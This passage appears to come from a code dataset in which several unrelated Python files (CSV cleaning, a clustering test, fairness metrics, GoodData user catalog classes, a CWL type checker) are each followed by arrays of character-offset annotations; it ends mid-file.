],
[
57377,
57383
],
[
57542,
57548
],
[
57594,
57600
],
[
57851,
57857
],
[
57903,
57909
],
[
58222,
58228
],
[
58269,
58275
],
[
58328,
58334
],
[
58451,
58457
],
[
58944,
58950
],
[
59207,
59213
],
[
59916,
59922
],
[
59935,
59941
],
[
59983,
59989
],
[
60683,
60689
],
[
61250,
61256
]
],
[
[
667,
675
],
[
2023,
2031
],
[
2060,
2068
],
[
2100,
2108
],
[
2144,
2152
],
[
2188,
2196
],
[
2231,
2239
],
[
2274,
2282
],
[
2313,
2321
],
[
2445,
2453
],
[
2561,
2569
],
[
2604,
2612
],
[
2649,
2657
],
[
2695,
2703
],
[
2741,
2749
],
[
2784,
2792
],
[
2828,
2836
],
[
2870,
2878
],
[
2918,
2926
],
[
2964,
2972
],
[
3010,
3018
],
[
3056,
3064
],
[
3102,
3110
],
[
3148,
3156
],
[
3264,
3272
],
[
3433,
3441
],
[
3477,
3485
],
[
3521,
3529
],
[
3564,
3572
],
[
3606,
3614
],
[
3648,
3656
],
[
3701,
3709
],
[
3747,
3755
],
[
3786,
3794
],
[
3827,
3835
],
[
3865,
3873
],
[
3980,
3988
],
[
4058,
4066
],
[
4111,
4119
],
[
4237,
4245
],
[
4397,
4405
],
[
4439,
4447
],
[
4484,
4492
],
[
4585,
4593
],
[
4625,
4633
],
[
4665,
4673
],
[
4703,
4711
],
[
4737,
4745
],
[
4770,
4778
],
[
4807,
4815
],
[
4844,
4852
],
[
4887,
4895
],
[
4930,
4938
],
[
4975,
4983
],
[
5012,
5020
],
[
5053,
5061
],
[
5093,
5101
],
[
5148,
5156
],
[
5187,
5195
],
[
5228,
5236
],
[
5268,
5276
],
[
5383,
5391
],
[
5421,
5429
],
[
5463,
5471
],
[
5503,
5511
],
[
5570,
5578
],
[
5629,
5637
],
[
5689,
5697
],
[
5866,
5874
],
[
5923,
5931
],
[
6040,
6048
],
[
6356,
6364
],
[
6632,
6640
],
[
6737,
6745
],
[
6753,
6761
],
[
6815,
6823
],
[
6872,
6880
],
[
6938,
6946
],
[
6995,
7003
],
[
7049,
7057
],
[
7128,
7136
],
[
7184,
7192
],
[
7244,
7252
],
[
7260,
7268
],
[
7320,
7328
],
[
7371,
7379
],
[
7422,
7430
],
[
7470,
7478
],
[
7488,
7496
],
[
7537,
7545
],
[
7553,
7561
],
[
7603,
7611
],
[
7619,
7627
],
[
7668,
7676
],
[
7716,
7724
],
[
7770,
7778
],
[
7787,
7795
],
[
7840,
7848
],
[
7857,
7865
],
[
7910,
7918
],
[
7927,
7935
],
[
7995,
8003
],
[
8049,
8057
],
[
8101,
8109
],
[
8188,
8196
],
[
8236,
8244
],
[
8253,
8261
],
[
8346,
8354
],
[
8393,
8401
],
[
8410,
8418
],
[
8456,
8464
],
[
8501,
8509
],
[
8571,
8579
],
[
8644,
8652
],
[
8716,
8724
],
[
8785,
8793
],
[
8854,
8862
],
[
8926,
8934
],
[
8997,
9005
],
[
9141,
9149
],
[
9210,
9218
],
[
9263,
9271
],
[
9280,
9288
],
[
9332,
9340
],
[
9386,
9394
],
[
9440,
9448
],
[
9494,
9502
],
[
9545,
9553
],
[
9597,
9605
],
[
9649,
9657
],
[
9769,
9777
],
[
9790,
9798
],
[
9842,
9850
],
[
9937,
9945
],
[
9988,
9996
],
[
10055,
10063
],
[
10105,
10113
],
[
10231,
10239
],
[
10291,
10299
],
[
10350,
10358
],
[
10406,
10414
],
[
10477,
10485
],
[
10498,
10506
],
[
10550,
10558
],
[
10665,
10673
],
[
10739,
10747
],
[
10873,
10881
],
[
10908,
10916
],
[
10929,
10937
],
[
10998,
11006
],
[
11063,
11071
],
[
11128,
11136
],
[
20184,
20192
],
[
20256,
20264
],
[
20388,
20396
],
[
20596,
20604
],
[
22749,
22757
],
[
23830,
23838
],
[
25930,
25938
],
[
48849,
48857
],
[
54456,
54464
],
[
57730,
57738
],
[
59271,
59279
],
[
59730,
59738
]
],
[
[
683,
685
],
[
28426,
28428
],
[
30852,
30854
],
[
31475,
31477
],
[
62979,
62981
],
[
63068,
63070
],
[
63158,
63160
],
[
63274,
63276
],
[
64987,
64989
],
[
65604,
65606
]
],
[
[
693,
695
],
[
55770,
55772
]
],
[
[
703,
709
],
[
56838,
56844
]
],
[
[
717,
727
],
[
25366,
25376
]
],
[
[
735,
739
],
[
40448,
40452
],
[
43619,
43623
],
[
48011,
48015
]
],
[
[
748,
755
],
[
32413,
32420
],
[
35686,
35693
],
[
37164,
37171
]
],
[
[
777,
796
],
[
1519,
1531
]
],
[
[
804,
814
],
[
41067,
41077
]
],
[
[
822,
825
],
[
20676,
20679
],
[
21125,
21128
],
[
21204,
21207
],
[
22805,
22808
],
[
22868,
22871
],
[
22929,
22932
],
[
23404,
23407
],
[
27238,
27241
],
[
53481,
53484
],
[
53888,
53891
]
],
[
[
848,
854
],
[
26641,
26647
],
[
26656,
26662
],
[
26863,
26869
],
[
34047,
34053
],
[
34079,
34085
],
[
34329,
34335
],
[
34371,
34377
],
[
34428,
34434
],
[
39285,
39291
],
[
39302,
39308
],
[
39438,
39444
],
[
39499,
39505
],
[
39525,
39531
],
[
39711,
39717
],
[
39726,
39732
],
[
39838,
39844
],
[
40022,
40028
],
[
40037,
40043
],
[
40171,
40177
],
[
40256,
40262
],
[
64445,
64451
],
[
64481,
64487
],
[
64655,
64661
],
[
66205,
66211
],
[
66220,
66226
],
[
66412,
66418
],
[
66684,
66690
],
[
66699,
66705
],
[
66875,
66881
],
[
66918,
66924
],
[
66997,
67003
],
[
67076,
67082
],
[
67091,
67097
],
[
67280,
67286
],
[
67846,
67852
],
[
67861,
67867
],
[
68052,
68058
],
[
68095,
68101
],
[
68166,
68172
],
[
70148,
70154
],
[
70163,
70169
],
[
70361,
70367
]
],
[
[
875,
885
],
[
65906,
65916
]
],
[
[
893,
901
],
[
70596,
70604
],
[
70722,
70730
],
[
70743,
70751
],
[
70780,
70788
],
[
70801,
70809
]
],
[
[
923,
929
],
[
62095,
62101
],
[
62340,
62346
],
[
62642,
62648
]
],
[
[
937,
945
],
[
15072,
15080
],
[
15127,
15135
],
[
15399,
15407
],
[
15468,
15476
],
[
16399,
16407
],
[
16468,
16476
],
[
16984,
16992
],
[
17104,
17112
],
[
17612,
17620
],
[
17674,
17682
],
[
18374,
18382
],
[
18443,
18451
],
[
18890,
18898
],
[
18959,
18967
],
[
19401,
19409
],
[
19466,
19474
],
[
19904,
19912
],
[
19966,
19974
]
],
[
[
953,
964
],
[
14830,
14841
],
[
14879,
14890
],
[
14911,
14922
],
[
15012,
15023
],
[
16082,
16093
],
[
16161,
16172
],
[
16347,
16358
],
[
17035,
17046
],
[
18232,
18243
],
[
18314,
18325
],
[
18788,
18799
]
],
[
[
972,
984
],
[
62901,
62913
]
],
[
[
992,
1005
],
[
14129,
14142
]
],
[
[
1013,
1025
],
[
12950,
12962
],
[
13026,
13038
],
[
13106,
13118
],
[
13174,
13186
],
[
13262,
13274
],
[
13344,
13356
],
[
13412,
13424
],
[
13482,
13494
],
[
13564,
13576
],
[
13644,
13656
],
[
43745,
43757
],
[
44083,
44095
],
[
44157,
44169
],
[
41391,
41403
],
[
41462,
41474
],
[
41853,
41865
],
[
41924,
41936
],
[
42444,
42456
],
[
42499,
42511
],
[
42553,
42565
],
[
42613,
42625
],
[
42872,
42884
],
[
42919,
42931
],
[
43158,
43170
],
[
43202,
43214
],
[
43256,
43268
],
[
43288,
43300
],
[
43409,
43421
],
[
43538,
43550
],
[
43794,
43806
],
[
43910,
43922
],
[
44284,
44296
],
[
44424,
44436
],
[
45092,
45104
],
[
45158,
45170
],
[
45252,
45264
],
[
45301,
45313
],
[
45385,
45397
],
[
45509,
45521
],
[
45714,
45726
],
[
45766,
45778
],
[
46007,
46019
],
[
46062,
46074
],
[
46132,
46144
],
[
46180,
46192
],
[
46228,
46240
],
[
46615,
46627
]
],
[
[
1033,
1041
],
[
41121,
41129
]
],
[
[
1069,
1077
],
[
70884,
70892
]
],
[
[
1104,
1113
],
[
29069,
29078
],
[
29913,
29922
],
[
14348,
14357
],
[
14565,
14574
],
[
15167,
15176
],
[
15565,
15574
],
[
15691,
15700
],
[
16565,
16574
],
[
16721,
16730
],
[
17148,
17157
],
[
17771,
17780
],
[
17897,
17906
],
[
18483,
18492
],
[
18999,
19008
],
[
19235,
19244
],
[
19564,
19573
],
[
19688,
19697
],
[
20006,
20015
],
[
20858,
20867
],
[
21374,
21383
],
[
21562,
21571
],
[
21681,
21690
],
[
21997,
22006
],
[
22091,
22100
],
[
22315,
22324
],
[
23174,
23183
],
[
23594,
23603
],
[
24077,
24086
],
[
25659,
25668
],
[
26095,
26104
],
[
27310,
27319
],
[
28828,
28837
],
[
29455,
29464
],
[
29644,
29653
],
[
30058,
30067
],
[
30443,
30452
],
[
31179,
31188
],
[
31744,
31753
],
[
32135,
32144
],
[
32844,
32853
],
[
33204,
33213
],
[
33585,
33594
],
[
34926,
34935
],
[
38310,
38319
],
[
44641,
44650
],
[
48529,
48538
],
[
49708,
49717
],
[
51384,
51393
],
[
51703,
51712
],
[
53196,
53205
],
[
54128,
54137
],
[
54264,
54273
],
[
54943,
54952
],
[
55322,
55331
],
[
56437,
56446
],
[
57207,
57216
],
[
58081,
58090
],
[
59056,
59065
],
[
59564,
59573
],
[
60037,
60046
],
[
60885,
60894
],
[
61416,
61425
],
[
65990,
65999
],
[
68508,
68517
],
[
69132,
69141
],
[
69666,
69675
],
[
70010,
70019
]
],
[
[
1148,
1152
],
[
11396,
11400
]
],
[
[
1185,
1196
],
[
37946,
37957
]
],
[
[
1229,
1244
],
[
28997,
29012
],
[
29842,
29857
]
],
[
[
1285,
1289
],
[
4028,
4032
],
[
10177,
10181
],
[
10534,
10538
],
[
11254,
11258
]
],
[
[
1330,
1337
],
[
28003,
28010
],
[
29248,
29255
],
[
30309,
30316
]
],
[
[
1378,
1387
],
[
14101,
14110
]
],
[
[
1428,
1436
],
[
66111,
66119
]
],
[
[
1477,
1487
],
[
1495,
1505
]
],
[
[
1489,
1492
],
[
27543,
27546
],
[
31992,
31995
],
[
34702,
34705
],
[
36009,
36012
]
],
[
[
1513,
1516
],
[
16685,
16688
],
[
22601,
22604
],
[
25002,
25005
],
[
26919,
26922
],
[
30634,
30637
],
[
32454,
32457
],
[
32692,
32695
],
[
33049,
33052
],
[
33415,
33418
],
[
36223,
36226
],
[
36604,
36607
],
[
38278,
38281
],
[
40482,
40485
],
[
40677,
40680
],
[
40896,
40899
],
[
41264,
41267
],
[
41722,
41725
],
[
42252,
42255
],
[
42756,
42759
],
[
43026,
43029
],
[
44901,
44904
],
[
45598,
45601
],
[
45879,
45882
],
[
46482,
46485
],
[
46851,
46854
],
[
47095,
47098
],
[
47334,
47337
],
[
47486,
47489
],
[
63383,
63386
],
[
68717,
68720
],
[
69415,
69418
]
],
[
[
1553,
1560
],
[
35780,
35787
]
],
[
[
1565,
1573
],
[
34011,
34019
],
[
35736,
35744
]
],
[
[
1579,
1586
]
],
[
[
1591,
1597
]
],
[
[
1602,
1616
]
],
[
[
1622,
1630
],
[
5528,
5536
],
[
6316,
6324
],
[
14184,
14192
],
[
20632,
20640
],
[
22785,
22793
],
[
25433,
25441
]
],
[
[
1656,
1664
],
[
6831,
6839
],
[
7010,
7018
],
[
7074,
7082
],
[
7146,
7154
],
[
7199,
7207
],
[
7277,
7285
],
[
7336,
7344
],
[
7389,
7397
],
[
7437,
7445
],
[
7685,
7693
],
[
7733,
7741
],
[
8066,
8074
],
[
8116,
8124
],
[
8154,
8162
],
[
8205,
8213
],
[
8317,
8325
],
[
8363,
8371
],
[
8473,
8481
],
[
8516,
8524
],
[
8732,
8740
],
[
8800,
8808
],
[
9158,
9166
],
[
9225,
9233
],
[
9296,
9304
],
[
9349,
9357
],
[
9510,
9518
],
[
9560,
9568
],
[
9614,
9622
],
[
23544,
23552
],
[
25816,
25824
],
[
25970,
25978
],
[
26301,
26309
],
[
26392,
26400
],
[
26488,
26496
],
[
27147,
27155
],
[
48428,
48436
],
[
48739,
48747
],
[
49252,
49260
],
[
49662,
49670
],
[
49877,
49885
],
[
52768,
52776
],
[
53450,
53458
],
[
53828,
53836
],
[
53982,
53990
],
[
54622,
54630
],
[
54817,
54825
],
[
56347,
56355
],
[
56700,
56708
],
[
57963,
57971
],
[
59329,
59337
],
[
59774,
59782
],
[
60400,
60408
],
[
60762,
60770
],
[
61079,
61087
],
[
61544,
61552
]
],
[
[
1690,
1698
],
[
21168,
21176
]
],
[
[
1724,
1731
],
[
23450,
23457
]
],
[
[
1756,
1764
],
[
9664,
9672
],
[
9805,
9813
],
[
49070,
49078
],
[
49515,
49523
]
],
[
[
1790,
1796
],
[
9858,
9864
],
[
50374,
50380
],
[
50466,
50472
],
[
50558,
50564
]
],
[
[
1820,
1828
],
[
10120,
10128
],
[
10366,
10374
],
[
10423,
10431
],
[
10618,
10626
],
[
10680,
10688
],
[
10946,
10954
],
[
11013,
11021
],
[
11080,
11088
],
[
56994,
57002
],
[
57464,
57472
],
[
57770,
57778
],
[
58859,
58867
],
[
60463,
60471
]
],
[
[
1854,
1860
],
[
6371,
6377
],
[
6414,
6420
],
[
6455,
6461
],
[
6496,
6502
],
[
58255,
58261
],
[
60292,
60298
]
],
[
[
1882,
1887
],
[
6524,
6529
],
[
6602,
6607
],
[
6648,
6653
],
[
6778,
6783
],
[
51627,
51632
],
[
52974,
52979
]
],
[
[
1910,
1917
],
[
9902,
9909
],
[
10072,
10079
],
[
23917,
23924
]
],
[
[
1950,
1967
],
[
23299,
23316
],
[
23357,
23374
]
],
[
[
2344,
2375
],
[
21056,
21087
]
],
[
[
2476,
2498
],
[
3299,
3321
],
[
50219,
50241
]
],
[
[
3178,
3202
],
[
9723,
9747
],
[
48808,
48832
],
[
49011,
49035
],
[
49466,
49490
]
],
[
[
3341,
3364
],
[
6576,
6599
],
[
6707,
6730
],
[
51511,
51534
],
[
51584,
51607
],
[
52451,
52474
],
[
52524,
52547
]
],
[
[
3894,
3924
],
[
10585,
10615
],
[
10775,
10805
],
[
57319,
57349
],
[
57391,
57421
]
],
[
[
4142,
4181
],
[
10827,
10866
],
[
58343,
58382
],
[
58490,
58529
]
],
[
[
4310,
4337
],
[
59675,
59702
]
],
[
[
4514,
4533
],
[
6162,
6181
],
[
25137,
25156
],
[
25199,
25218
]
],
[
[
5300,
5325
],
[
6288,
6313
],
[
25086,
25111
]
],
[
[
11143,
11159
],
[
52695,
52711
],
[
52902,
52918
]
],
[
[
11164,
11180
],
[
52713,
52729
],
[
52921,
52937
]
],
[
[
11185,
11200
],
[
52731,
52746
],
[
52940,
52955
]
],
[
[
11206,
11223
],
[
52862,
52879
]
],
[
[
11229,
11251
],
[
56948,
56970
]
],
[
[
11383,
11395
],
[
32561,
32573
],
[
33906,
33918
],
[
35933,
35945
],
[
41624,
41636
],
[
44204,
44216
],
[
44543,
44555
],
[
45022,
45034
],
[
55465,
55477
]
]
] |
from .core import *
from .usual_models import *
| [
[
[
18,
19
]
],
[
[
47,
48
]
]
] |
import pandas as pd
import re
data = pd.read_csv("BIPMetadata_current.csv")
def format_date(date_column):
# formatting the date data to display as yyyy-mm-dd
new_dates = []
for date in date_column:
month = date[0:date.find('/')]
date = date[date.find('/')+1:]
day = date[0:date.find('/')]
year = date[date.find('/')+1:]
if (len(month) == 1):
month = "0" + month
if (len(day) == 1):
day = "0" + day
if (len(year) == 2):
year = "20" + year
newDate = year + "-" + month + "-" + day
print(newDate)
new_dates.append(newDate)
return new_dates
def truncate(column, length):
# truncates given column to given length and returns new column
new_d = []
for d in column:
if (len(d) > length):
d = d[0:length]
new_d.append(d)
return new_d
# source: https://stackoverflow.com/questions/9662346/python-code-to-remove-html-tags-from-a-string
def cleanhtml(column):
new_desc = []
for d in column:
cleanr = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')
cleantext = re.sub(cleanr, '', d)
new_desc.append(' '.join(cleantext.split()))
return new_desc
def remove_spaces(column):
new_sql = []
for d in column:
new_sql.append(' '.join(d.split()))
return new_sql
new_created = format_date(data["created"])
print("UPDATAED")
new_updated = format_date(data["updated"])
new_query = remove_spaces(data["sql_query"])
new_query = truncate(new_query, 5000)
new_description = truncate(data["description"], 500)
new_description = cleanhtml(new_description)
data["created"] = new_created
data["updated"] = new_updated
data["sql_query"] = new_query
data["description"] = new_description
data.to_csv("BIPMetadata_cleaned.csv", index=False) | [
[
[
7,
19
],
[
38,
40
]
],
[
[
27,
29
],
[
1097,
1099
],
[
1179,
1181
]
],
[
[
31,
35
],
[
1432,
1436
],
[
1493,
1497
],
[
1536,
1540
],
[
1620,
1624
],
[
1693,
1697
],
[
1723,
1727
],
[
1753,
1757
],
[
1783,
1787
],
[
1823,
1827
]
],
[
[
82,
93
],
[
1420,
1431
],
[
1481,
1492
]
],
[
[
687,
695
],
[
1567,
1575
],
[
1611,
1619
]
],
[
[
1022,
1031
],
[
1664,
1673
]
],
[
[
1280,
1293
],
[
1522,
1535
]
],
[
[
1406,
1417
],
[
1711,
1722
]
],
[
[
1467,
1478
],
[
1741,
1752
]
],
[
[
1510,
1519
],
[
1576,
1585
]
],
[
[
1555,
1564
],
[
1773,
1782
]
],
[
[
1593,
1608
],
[
1674,
1689
]
],
[
[
1646,
1661
],
[
1805,
1820
]
]
] |
import os
from wellcomeml.ml.clustering import TextClustering
from wellcomeml.viz.visualize_clusters import visualize_clusters
def test_output_html(tmp_path):
"""Tests that the output html is generated correclty by the clustering function"""
# This will be the file to
temporary_file = os.path.join(tmp_path, 'test-cluster.html')
# Run clustering on small dummy data (see test_clustering.py)
cluster = TextClustering(embedding_random_state=42,
reducer_random_state=43,
clustering_random_state=44)
X = ['Wellcome Trust',
'The Wellcome Trust',
'Sir Henry Wellcome',
'Francis Crick',
'Crick Institute',
'Francis Harry Crick']
cluster.fit(X)
# Run the visualisation function with output_file=temporary_file
visualize_clusters(clustering=cluster, output_file_path=temporary_file, radius=0.01,
alpha=0.5, output_in_notebook=False)
# Assert that the html was generated correctly
assert os.path.exists(temporary_file)
| [
[
[
7,
9
],
[
302,
304
],
[
1058,
1060
]
],
[
[
48,
62
],
[
427,
441
]
],
[
[
109,
127
],
[
850,
868
]
],
[
[
134,
150
]
]
] |
#!/usr/bin/env python
import numpy as np
from collections import defaultdict
import itertools
from sklearn.metrics import confusion_matrix
def print_data_stats(sens_attr, class_labels):
"""Print a few numbers about the data: Total number of points, number of
protected examples and unprotected examples, and number of protected points
in positive class, and number of unprotected points in positive class.
Parameters
-----------
sens_attr: numpy array
The sensitive attribute of shape=(number_points,).
class_labels: nunmp
The class labels of shape=(number_points,).
"""
non_prot_all = sum(sens_attr == 1.0) # non-protected group
prot_all = len(sens_attr) - non_prot_all # protected group
non_prot_pos = sum(class_labels[sens_attr == 1.0] == 1.0) # non_protected in positive class
prot_pos = sum(class_labels == 1.0) - non_prot_pos # protected in positive class
frac_non_prot_pos = float(non_prot_pos) / float(non_prot_all)
frac_prot_pos = float(prot_pos) / float(prot_all)
print
print("Total data points: %d" % len(sens_attr))
print("# non-protected examples: %d" % non_prot_all)
print("# protected examples: %d" % prot_all)
print("# non-protected examples in positive class: %d (%0.1f%%)" % (non_prot_pos, non_prot_pos * 100.0 / non_prot_all))
print("# protected examples in positive class: %d (%0.1f%%)" % (prot_pos, prot_pos * 100.0 / prot_all))
def get_positive_rate(y_predicted, y_true):
"""Compute the positive rate for given predictions of the class label.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
Returns
---------
pr: float
The positive rate.
"""
tn, fp, fn, tp = confusion_matrix(y_true, y_predicted).ravel()
pr = (tp+fp) / (tp+fp+tn+fn)
return pr
def get_true_positive_rate(y_predicted, y_true):
"""Compute the true positive rate for given predictions of the class label.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
Returns
---------
tpr: float
The true positive rate.
"""
tn, fp, fn, tp = confusion_matrix(y_true, y_predicted).ravel()
tpr = tp / (tp+fn)
return tpr
def compute_fairness_measures(y_predicted, y_true, sens_attr):
"""Compute value of demographic parity and equality of opportunity for given predictions.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
sens_attr: numpy array
The sensitive labels of shape=(number_points,).
Returns
----------
DDP: float
The difference of demographic parity.
DEO: float
The difference of equality of opportunity.
"""
positive_rate_prot = get_positive_rate(y_predicted[sens_attr==-1], y_true[sens_attr==-1])
positive_rate_unprot = get_positive_rate(y_predicted[sens_attr==1], y_true[sens_attr==1])
true_positive_rate_prot = get_true_positive_rate(y_predicted[sens_attr==-1], y_true[sens_attr==-1])
true_positive_rate_unprot = get_true_positive_rate(y_predicted[sens_attr==1], y_true[sens_attr==1])
DDP = positive_rate_unprot - positive_rate_prot
DEO = true_positive_rate_unprot - true_positive_rate_prot
rates = [positive_rate_unprot, positive_rate_prot]
DP = np.min(rates)/(np.max(rates) + 1e-5)
return DDP, DEO, DP
def get_accuracy(y_true, y_predicted):
"""Compute the accuracy for given predicted class labels.
Parameters
----------
y_true: numpy array
The true class labels of shape=(number_points,).
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
Returns
---------
accuracy: float
The accuracy of the predictions.
"""
correct_answers = (y_predicted == y_true).astype(int) # will have 1 when the prediction and the actual label match
accuracy = float(sum(correct_answers)) / float(len(correct_answers))
return accuracy
| [
[
[
29,
40
],
[
3663,
3665
],
[
3678,
3680
]
],
[
[
65,
76
]
],
[
[
84,
93
]
],
[
[
122,
138
],
[
1869,
1885
],
[
2398,
2414
]
],
[
[
144,
160
]
],
[
[
1454,
1471
],
[
3114,
3131
],
[
3210,
3227
]
],
[
[
1967,
1989
],
[
3307,
3329
],
[
3413,
3435
]
],
[
[
2487,
2512
]
],
[
[
3730,
3742
]
]
] |
# (C) 2022 GoodData Corporation
from __future__ import annotations
from pathlib import Path
from typing import List, Optional, Type
import attr
from gooddata_metadata_client.model.declarative_user import DeclarativeUser
from gooddata_metadata_client.model.declarative_users import DeclarativeUsers
from gooddata_sdk.catalog.base import Base
from gooddata_sdk.catalog.identifier import CatalogUserGroupIdentifier
from gooddata_sdk.utils import create_directory, read_layout_from_file, write_layout_to_file
LAYOUT_USERS_DIR = "users"
LAYOUT_USERS_FILE = "users.yaml"
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeUsers(Base):
users: List[CatalogDeclarativeUser]
@staticmethod
def client_class() -> Type[DeclarativeUsers]:
return DeclarativeUsers
@classmethod
def load_from_disk(cls, layout_organization_folder: Path) -> CatalogDeclarativeUsers:
users_directory = layout_organization_folder / LAYOUT_USERS_DIR
users_file = users_directory / LAYOUT_USERS_FILE
data = read_layout_from_file(users_file)
users = []
for record in data:
users.append(CatalogDeclarativeUser.from_dict(record, camel_case=True))
return cls(users=users)
def store_to_disk(self, layout_organization_folder: Path) -> None:
users_directory = layout_organization_folder / LAYOUT_USERS_DIR
users_file = users_directory / LAYOUT_USERS_FILE
create_directory(users_directory)
users = [user.to_dict(camel_case=True) for user in self.users]
write_layout_to_file(users_file, users)
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeUser(Base):
id: str
auth_id: Optional[str] = None
user_groups: List[CatalogUserGroupIdentifier] = []
@staticmethod
def client_class() -> Type[DeclarativeUser]:
return DeclarativeUser
| [
[
[
55,
66
]
],
[
[
88,
92
],
[
864,
868
],
[
1296,
1300
]
],
[
[
112,
116
],
[
660,
664
],
[
1743,
1747
]
],
[
[
118,
126
],
[
1705,
1713
]
],
[
[
128,
132
],
[
734,
738
],
[
1826,
1830
]
],
[
[
141,
145
],
[
572,
576
],
[
1604,
1608
]
],
[
[
207,
222
],
[
1831,
1846
],
[
1864,
1879
]
],
[
[
284,
300
],
[
739,
755
],
[
773,
789
]
],
[
[
339,
343
],
[
642,
646
],
[
1673,
1677
]
],
[
[
388,
414
],
[
1748,
1774
]
],
[
[
446,
462
],
[
1448,
1464
]
],
[
[
464,
485
],
[
1042,
1063
]
],
[
[
487,
507
],
[
1561,
1581
]
],
[
[
509,
525
],
[
953,
969
],
[
1366,
1382
]
],
[
[
536,
553
],
[
1009,
1026
],
[
1422,
1439
]
],
[
[
618,
641
],
[
873,
896
]
],
[
[
1650,
1672
],
[
1148,
1170
]
]
] |
import logging
from collections import namedtuple
from typing import (Any, Callable, Dict, # pylint: disable=unused-import
Generator, Iterable, List, Optional, Text, Union, cast)
import schema_salad.validate as validate
from schema_salad.sourceline import SourceLine, bullets, strip_dup_lineno
import six
from .errors import WorkflowException
from .loghandler import _logger
from .process import shortname
from .utils import json_dumps
def _get_type(tp):
# type: (Any) -> Any
if isinstance(tp, dict):
if tp.get("type") not in ("array", "record", "enum"):
return tp["type"]
return tp
def check_types(srctype, sinktype, linkMerge, valueFrom):
# type: (Any, Any, Optional[Text], Optional[Text]) -> Text
"""Check if the source and sink types are "pass", "warning", or "exception".
"""
if valueFrom:
return "pass"
elif not linkMerge:
if can_assign_src_to_sink(srctype, sinktype, strict=True):
return "pass"
elif can_assign_src_to_sink(srctype, sinktype, strict=False):
return "warning"
else:
return "exception"
elif linkMerge == "merge_nested":
return check_types({"items": _get_type(srctype), "type": "array"}, _get_type(sinktype), None, None)
elif linkMerge == "merge_flattened":
return check_types(merge_flatten_type(_get_type(srctype)), _get_type(sinktype), None, None)
else:
raise WorkflowException(u"Unrecognized linkMerge enu_m '%s'" % linkMerge)
def merge_flatten_type(src):
# type: (Any) -> Any
"""Return the merge flattened type of the source type
"""
if isinstance(src, list):
return [merge_flatten_type(t) for t in src]
elif isinstance(src, dict) and src.get("type") == "array":
return src
else:
return {"items": src, "type": "array"}
def can_assign_src_to_sink(src, sink, strict=False): # type: (Any, Any, bool) -> bool
"""Check for identical type specifications, ignoring extra keys like inputBinding.
src: admissible source types
sink: admissible sink types
In non-strict comparison, at least one source type must match one sink type.
In strict comparison, all source types must match at least one sink type.
"""
if src == "Any" or sink == "Any":
return True
if isinstance(src, dict) and isinstance(sink, dict):
if sink.get("not_connected") and strict:
return False
if src["type"] == "array" and sink["type"] == "array":
return can_assign_src_to_sink(src["items"], sink["items"], strict)
elif src["type"] == "record" and sink["type"] == "record":
return _compare_records(src, sink, strict)
elif src["type"] == "File" and sink["type"] == "File":
for sinksf in sink.get("secondaryFiles", []):
if not [1 for srcsf in src.get("secondaryFiles", []) if sinksf == srcsf]:
if strict:
return False
return True
else:
return can_assign_src_to_sink(src["type"], sink["type"], strict)
elif isinstance(src, list):
if strict:
for t in src:
if not can_assign_src_to_sink(t, sink):
return False
return True
else:
for t in src:
if can_assign_src_to_sink(t, sink):
return True
return False
elif isinstance(sink, list):
for t in sink:
if can_assign_src_to_sink(src, t):
return True
return False
else:
return src == sink
def _compare_records(src, sink, strict=False):
# type: (Dict[Text, Any], Dict[Text, Any], bool) -> bool
"""Compare two records, ensuring they have compatible fields.
This handles normalizing record names, which will be relative to workflow
step, so that they can be compared.
"""
def _rec_fields(rec): # type: (Dict[Text, Any]) -> Dict[Text, Any]
out = {}
for field in rec["fields"]:
name = shortname(field["name"])
out[name] = field["type"]
return out
srcfields = _rec_fields(src)
sinkfields = _rec_fields(sink)
for key in six.iterkeys(sinkfields):
if (not can_assign_src_to_sink(
srcfields.get(key, "null"), sinkfields.get(key, "null"), strict)
and sinkfields.get(key) is not None):
_logger.info("Record comparison failure for %s and %s\n"
"Did not match fields for %s: %s and %s" %
(src["name"], sink["name"], key, srcfields.get(key),
sinkfields.get(key)))
return False
return True
def static_checker(workflow_inputs, workflow_outputs, step_inputs, step_outputs, param_to_step):
# type: (List[Dict[Text, Any]], List[Dict[Text, Any]], List[Dict[Text, Any]], List[Dict[Text, Any]], Dict[Text, Dict[Text, Any]]) -> None
"""Check if all source and sink types of a workflow are compatible before run time.
"""
# source parameters: workflow_inputs and step_outputs
# sink parameters: step_inputs and workflow_outputs
# make a dictionary of source parameters, indexed by the "id" field
src_parms = workflow_inputs + step_outputs
src_dict = {}
for parm in src_parms:
src_dict[parm["id"]] = parm
step_inputs_val = check_all_types(src_dict, step_inputs, "source")
workflow_outputs_val = check_all_types(src_dict, workflow_outputs, "outputSource")
warnings = step_inputs_val["warning"] + workflow_outputs_val["warning"]
exceptions = step_inputs_val["exception"] + workflow_outputs_val["exception"]
warning_msgs = []
exception_msgs = []
for warning in warnings:
src = warning.src
sink = warning.sink
linkMerge = warning.linkMerge
if sink.get("secondaryFiles") and sorted(sink.get("secondaryFiles",[])) != sorted(src.get("secondaryFiles",[])):
msg1 = "Sink '%s'" % (shortname(sink["id"]))
msg2 = SourceLine(sink.get("_tool_entry", sink), "secondaryFiles").makeError(
"expects secondaryFiles: %s but" % (sink.get("secondaryFiles")))
if "secondaryFiles" in src:
msg3 = SourceLine(src, "secondaryFiles").makeError(
"source '%s' has secondaryFiles %s." % (shortname(src["id"]), src.get("secondaryFiles")))
else:
msg3 = SourceLine(src, "id").makeError(
"source '%s' does not include secondaryFiles." % (shortname(src["id"])))
msg4 = SourceLine(src, "id").makeError("To fix, add secondaryFiles: %s to definition of '%s'." % (sink.get("secondaryFiles"), shortname(src["id"])))
msg = SourceLine(sink).makeError("%s\n%s" % (msg1, bullets([msg2, msg3, msg4], " ")))
elif sink.get("not_connected"):
msg = SourceLine(sink, "type").makeError(
"'%s' is not an input parameter of %s, expected %s"
% (shortname(sink["id"]), param_to_step[sink["id"]]["run"],
", ".join(shortname(s["id"])
for s in param_to_step[sink["id"]]["inputs"]
if not s.get("not_connected"))))
else:
msg = SourceLine(src, "type").makeError(
"Source '%s' of type %s may be incompatible"
